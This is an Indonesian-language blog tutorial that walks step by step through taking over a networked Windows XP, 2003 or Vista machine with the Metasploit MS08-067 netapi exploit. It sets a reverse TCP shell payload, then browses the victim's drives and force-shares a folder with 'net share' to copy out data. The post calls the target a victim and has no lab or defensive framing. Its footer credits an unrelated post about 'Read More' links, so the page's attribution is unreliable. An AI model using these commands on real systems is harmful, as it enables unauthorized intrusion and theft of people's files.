MENGAMBIL ALIH KOMPUTER TARGET DALAM JARINGAN(Win XP SP2, SP3, Win 2003, Win Vista). By: OGHIE-X
Ho ho ho,
akhirnya setalah istirahat panjang selama 3 tahun dari dunia IT, gue
akhirnya kembali lagi. Kalau dalam film superhero “BATMAN RETURN”, no
no… bukan BATMAN RETURN tapi oghie Return. Sekembali gue dari dunia
Entertaintmen (bukan artis lho) banyak buanget perubahan yang berarti di
dunia IT, termasuk hacking. Kalau dijaman gue dulu, terakhir gue sempat
menggunakan Windows XP Sp1 yang terdapat banyak sekali kelemahan. Namun
sekarang gue lihat bapak Bill Gates udah ngeluarin pamungkas barunya
yang begitu megah yaitu Windows Pisang… Uppss bukan Pisang tapi Windows
Vista. He he he. Belum lagi XP udah di patch kelemahannya hingga Service Pack 3. Tapi tetap saja mempunyai kelemahan pada file Netapi32.dll pada direktori system32. Mau bukti…?, ok ok kita to the point aje.
Kali ini teknik yang kita gunakan yaitu teknik Remote Exploit. Dan Yang perlu kamu siapkan pada sesi kali ini yaitu:
- Metasploit Framework 3.2 For Windows, dapat kamu download disini: http://www.metasploit.org/framework/download/?id=framework-3.2.exe
- Komputer target yang menggunakan OS Win XP SP2, SP3, Win2003, atau WinVista. (gue menggunakan Windows XP SP2).
- - Alamat IP Address Target.
Jika
diatas telah terpenuhi, sekarang kamu jalankan Program Metasploit 3.2,
tepatnya kamu pilih Metasploit 3 Web (lihat gambar).
Tunggu beberapa saat,(sabar yach) Setelah itu akan tampil seperti gambar dibawah ini:
Jika udah tampil loe pilih menu Console. Maka akan tampil jendela seperti berikut:
Ketikkan perintah show exploits kemudian tekan Enter
Maka akan tampil Modul exploit seperti beirkut:
Kemudian pilih modul exploit untuk kelemahan pada Netapi32, caranya dengan mengetikkan :
use windows/smb/ms08_067_netapi kemudian Enter
Kemudian
pilih jenis payload. Kali ini kita pilih payload yang akan
menghubungkan shell komputer target dengan komputer penyerang melalui
TCP. Caranya dengan mengetikkan perintah:
set payload windows/shell/reverse_tcp (kemudian Enter)
Kemudian masukkan IP Address kamu, dengan cara mengetikkan perintah :
set LHOST 192.168.0.17 Enter <----- Contoh dengan IP gue.
set LHOST 192.168.0.17 Enter <----- Contoh dengan IP gue.
Kemudian masukkan IP Address target kamu, dengan cara mengetikkan perintah :
set RHOST 192.168.0.16 Enter <----- Contoh dengan Target gue.
set RHOST 192.168.0.16 Enter <----- Contoh dengan Target gue.
Semuanya udah siap…? Siap…!!! Ready!!! 1….2….3… tunggu dulu bro, ketik dulu instruksi/perintah exploit kemudian tekan Enter.
Tedennnnggggg!!! Abrakadabra!!!, sistem target telah diambil alih
Sekarang kita telah berada di direktori c:\windows\system32
sang target. Akses penuh telah ditangan. Selanjutnya tinggal
kreatifitas kalian. Untuk mengintip data pada komputer target, silahkan
jalankan perintah MS DOS. Sebagai contoh, kita akan menuju drive “D”
korban, dengan mengetikkan perintah >> d: Enter. Kemudian lakukan perintah DIR untuk melihat isi data drive D komputer korban.
Untuk mengambil data pada komputer korban, kita akan melakukan sharing paksa dari komputer korban dengan menjalankan perintah.
net share namafolder=d:\lokasifolder /UNLIMITED kemudian enter. Lihat gambar dibawah ini:
Kemudian
masuk pada windows Explorer, lalu ketikkan pada Address Bar \\Alamat IP
target\namafolder yang telah dishare paksa. Contoh:
Original Content of Cara Membuat Read More atau Baca Selengkapnya di Blogspot | Kang Sunu™ Blogsite http://kangsunu.blogspot.com/2012/04/cara-membuat-read-more-atau-baca.html#ixzz27Dqu5qgO
Copyright. Kang Sunu
0 komentar:
Posting Komentar